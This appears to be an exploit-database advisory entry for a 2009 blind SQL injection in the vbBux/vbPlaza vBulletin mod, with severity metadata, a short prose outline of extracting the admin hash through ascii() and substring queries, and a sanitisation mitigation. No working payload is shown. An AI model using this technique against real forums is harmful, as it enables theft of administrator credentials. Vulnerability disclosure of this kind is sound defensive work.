vendor:
vbBux/vbPlaza
by:
Cold z3ro & Crck_Man
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: vbBux/vbPlaza
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin_2.x
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009
vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability
A Blind SQL Injection vulnerability exists in the name of vbplaza.php, a mod for vBulletin, which is able to retrieve admin hash. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ascii() function to encode the substring of the SELECT statement to retrieve the admin hash.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.
